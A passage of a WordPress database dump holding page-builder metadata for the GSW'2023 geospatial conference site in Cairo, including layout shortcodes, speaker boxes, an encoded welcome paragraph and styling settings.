(6434,2394,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\\\"][vc_column offset=\\\"vc_col-lg-12 vc_col-md-12\\\"][ultimate_heading main_heading=\\\"GSW\'2023 By\\\" main_heading_color=\\\"#ffffff\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" margin_design_tab_text=\\\"\\\"][\\/ultimate_heading][dt_team_masonry img_border_radius=\\\"0px\\\" bwb_columns=\\\"desktop:2|h_tablet:2|v_tablet:2|phone:1\\\" post_title_bottom_margin=\\\"0px\\\" soc_icon_border_width=\\\"0px\\\" soc_icon_color=\\\"#ffffff\\\" posts_offset=\\\"0\\\" category=\\\"\\\"][\\/vc_column][\\/vc_row]<\\/p>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),
(6435,2394,'_elementor_page_assets','a:0:{}'),
(6436,2394,'_elementor_page_settings','a:15:{s:19:\"the7_document_title\";s:9:\"slideshow\";s:41:\"the7_document_slideshow_revolution_slider\";s:28:\"the7-software-company-slider\";s:42:\"the7_document_disabled_header_color_scheme\";s:5:\"light\";s:41:\"the7_document__background_below_slideshow\";s:8:\"disabled\";s:39:\"the7_document_fancy_header_color_scheme\";s:5:\"light\";s:30:\"the7_document_sidebar_position\";s:8:\"disabled\";s:28:\"the7_document_show_footer_wa\";s:1:\"0\";s:25:\"the7_document_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:27:\"the7_document_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:28:\"the7_document_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:26:\"the7_document_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:32:\"the7_document_mobile_padding_top\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:34:\"the7_document_mobile_padding_right\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}s:35:\"the7_document_mobile_padding_bottom\";a:2:{s:4:\"size\";s:1:\"0\";s:4:\"unit\";s:2:\"px\";}s:33:\"the7_document_mobile_padding_left\";a:2:{s:4:\"size\";s:0:\"\";s:4:\"unit\";s:2:\"px\";}}'),
(6437,2394,'_elementor_css','a:7:{s:4:\"time\";i:1665148472;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),
(6446,2396,'_elementor_edit_mode','builder'),
(6447,2396,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(6448,2396,'_wp_page_template','default'),
(6449,2396,'_elementor_template_type','wp-page'),
(6450,2396,'_elementor_version','3.7.8'),
(6451,2396,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" bg_override=\\\"ex-full\\\" enable_overlay=\\\"enable_overlay_value\\\" overlay_color=\\\"rgba(0,0,0,0.6)\\\" type=\\\"vc_default\\\" css=\\\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\\\"][vc_column width=\\\"5\\/6\\\" offset=\\\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\\\" el_class=\\\"text-centered\\\"][ultimate_heading main_heading=\\\"REGISTRATION FEES\\\" main_heading_color=\\\"#ffffff\\\" sub_heading_color=\\\"#ffffff\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"120\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:50px;\\\" margin_design_tab_text=\\\"\\\"]Opening of registration platform: soon[\\/ultimate_heading][dt_default_button link=\\\"url:%2Fsoftware-company%2Fshowcase%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]INFORMATION[\\/dt_default_button][dt_default_button link=\\\"url:%2Fsoftware-company%2Fcontact%2F|||\\\" size=\\\"big\\\" btn_width=\\\"btn_fixed_width\\\" custom_btn_width=\\\"200\\\" css=\\\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\\\"]CONTACT US[\\/dt_default_button][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"grad\\\" bg_override=\\\"ex-full\\\" type=\\\"vc_default\\\" margin_top=\\\"-50\\\" css=\\\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\\\" bg_grad=\\\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: 